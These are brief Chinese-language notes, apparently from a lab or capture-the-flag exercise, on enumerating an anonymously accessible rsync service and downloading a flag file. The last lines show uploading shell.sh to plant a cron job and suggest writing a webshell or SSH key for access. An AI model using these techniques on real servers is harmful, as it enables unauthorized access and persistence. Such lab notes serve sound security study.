信息收集
rsync 是一个常用的 Linux 应用程序,用于文件同步
默认端口 873 使用文档
连接
匿名登录,列出可用目录
rsync --list-only 10.129.143.220::
rsync rsync://10.129.143.220/
列出目录下的文件
rsync --list-only 10.129.143.220::public
rsync rsync://10.129.143.220/public
下载文件
rsync 10.129.143.220::public/flag.txt flag.txt
rsync rsync://10.129.143.220/public/flag.txt flag.txt
上传文件,未测试,网上的例子是写入定时任务
rsync -av shell.sh rsync://10.129.143.220:873/public/shell.sh
此外如果目标有Web服务的话,可以直接写WebShell,或者可以通过写ssh公钥实现获取权限